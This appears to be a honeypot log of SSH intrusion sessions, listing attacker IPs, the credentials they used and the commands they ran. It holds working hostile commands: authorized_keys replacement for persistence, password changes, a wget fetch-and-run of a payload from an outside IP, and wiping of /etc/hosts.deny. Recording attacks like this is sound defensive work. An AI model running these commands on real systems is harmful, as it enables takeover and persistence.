$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456\nckdA37Xb6qpB\nckdA37Xb6qpB"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123456\nckdA37Xb6qpB\nckdA37Xb6qpB\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "ftptest2024\nrZoHhBkYYiRr\nrZoHhBkYYiRr"|passwd|bash
$ echo "ftptest2024\nrZoHhBkYYiRr\nrZoHhBkYYiRr\n"|passwd
$ echo -e "testpass\nIadHFIp163oq\nIadHFIp163oq"|passwd|bash
$ echo "testpass\nIadHFIp163oq\nIadHFIp163oq\n"|passwd
🎭 cipher_root_101 (85.116.182.214) β€” Atyrau, Kazakhstan Β· 1 session Β· 20 cmds
2026-05-10 20:22 EDT Β· as admin01/123456
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nN1f36yBNmieE\nN1f36yBNmieE"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nN1f36yBNmieE\nN1f36yBNmieE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_96 (193.123.76.37) β€” Dubai, United Arab Emirates Β· 1 session Β· 9 cmds
2026-05-10 20:12 EDT Β· as root/Qwerty1
execute from /tmp
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
$ rm ./upnpsetup
$ wget -nc http://45.87.174.8/k.php?a=x86_64,NJ111MI6Y4759449H -O ./upnpsetup
$ chmod 777 ./upnpsetup // make executable (world)
$ sudo ./upnpsetup
$ ./upnpsetup // execute payload
🎭 shadow_root_97 (187.230.120.231) β€” Nogales, Mexico Β· 1 session Β· 20 cmds
2026-05-10 19:38 EDT Β· as dev/dev-2022
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dev-2022\nIbOT3bsklRCI\nIbOT3bsklRCI"|passwd|bash
$ Enter new UNIX password:
$ echo "dev-2022\nIbOT3bsklRCI\nIbOT3bsklRCI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_28 (117.50.75.90) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-10 19:38 EDT Β· as admin/Aa12345678
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Aa12345678\nQPSRTbJgg6dF\nQPSRTbJgg6dF"|passwd|bash
$ Enter new UNIX password:
$ echo "Aa12345678\nQPSRTbJgg6dF\nQPSRTbJgg6dF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shogun_root_11 (118.194.229.94) β€” Tokyo, Japan Β· 1 session Β· 20 cmds
2026-05-10 17:36 EDT Β· as test/7654321
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "7654321\nZQ1xKjMh6XYf\nZQ1xKjMh6XYf"|passwd|bash
$ Enter new UNIX password:
$ echo "7654321\nZQ1xKjMh6XYf\nZQ1xKjMh6XYf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_98 (197.243.0.62) β€” Kigali, Rwanda Β· 1 session Β· 20 cmds
2026-05-10 15:20 EDT Β· as user00/user00
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user00\nfMWrNUKBmbPh\nfMWrNUKBmbPh"|passwd|bash
$ Enter new UNIX password:
$ echo "user00\nfMWrNUKBmbPh\nfMWrNUKBmbPh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_35 (222.247.32.186) β€” Heshan, China Β· 1 session Β· 20 cmds
2026-05-10 12:34 EDT Β· as test/qazwsxedc123
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qazwsxedc123\nSAXtfcnLltNx\nSAXtfcnLltNx"|passwd|bash
$ Enter new UNIX password:
$ echo "qazwsxedc123\nSAXtfcnLltNx\nSAXtfcnLltNx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_24 (77.87.40.114) β€” Kyiv, Ukraine Β· 2 sessions Β· 40 cmds
2026-05-10 12:13 EDT Β· as kafka/123456789, ubuntu/guest
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "guest\nj5sYabo4T9OC\nj5sYabo4T9OC"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "guest\nj5sYabo4T9OC\nj5sYabo4T9OC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456789\nQSywjlaT0pnz\nQSywjlaT0pnz"|passwd|bash
$ echo "123456789\nQSywjlaT0pnz\nQSywjlaT0pnz\n"|passwd
🎭 lantern_db (49.84.226.19) β€” Nanjing, China Β· 1 session Β· 20 cmds
2026-05-10 12:25 EDT Β· as postgres/postgres@123
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "postgres@123\nEAI9tnrhGYZp\nEAI9tnrhGYZp"|passwd|bash
$ Enter new UNIX password:
$ echo "postgres@123\nEAI9tnrhGYZp\nEAI9tnrhGYZp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_106 (165.232.167.235) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-10 10:48 EDT Β· as server/admin123, smbuser/smbuser123
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "admin123\n1AOi05pqwovE\n1AOi05pqwovE"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "admin123\n1AOi05pqwovE\n1AOi05pqwovE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "smbuser123\nO0tGr9vN8Ddg\nO0tGr9vN8Ddg"|passwd|bash
$ echo "smbuser123\nO0tGr9vN8Ddg\nO0tGr9vN8Ddg\n"|passwd
🎭 wraith_root_104 (101.47.158.56) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-10 10:29 EDT Β· as server/admin123, smbuser/smbuser123
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "smbuser123\nHsiYpZS0J7ms\nHsiYpZS0J7ms"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "smbuser123\nHsiYpZS0J7ms\nHsiYpZS0J7ms\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "admin123\nX7k7fLXpumkx\nX7k7fLXpumkx"|passwd|bash
$ echo "admin123\nX7k7fLXpumkx\nX7k7fLXpumkx\n"|passwd
🎭 cipher_root_102 (14.224.227.189) β€” Hanoi, Vietnam Β· 1 session Β· 19 cmds
2026-05-10 10:52 EDT Β· as root/admin2019*
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:z4JWhy35klt6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_116 (101.32.248.94) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-10 09:54 EDT Β· as ali/1234567
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234567\njwkrJtd6WpBl\njwkrJtd6WpBl"|passwd|bash
$ Enter new UNIX password:
$ echo "1234567\njwkrJtd6WpBl\njwkrJtd6WpBl\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_99 (211.75.38.199) β€” Taichung, Taiwan Β· 1 session Β· 19 cmds
2026-05-10 09:03 EDT Β· as root/Lapsus123$%
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ZhI9QsjT8hHS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_105 (203.205.37.233) β€” Ho Chi Minh City, Vietnam Β· 3 sessions Β· 60 cmds
2026-05-10 02:32 EDT Β· as admin9/admin9, user/112233, user2/root
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "112233\nVaTysBwNmuCW\nVaTysBwNmuCW"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "112233\nVaTysBwNmuCW\nVaTysBwNmuCW\n"|passwd
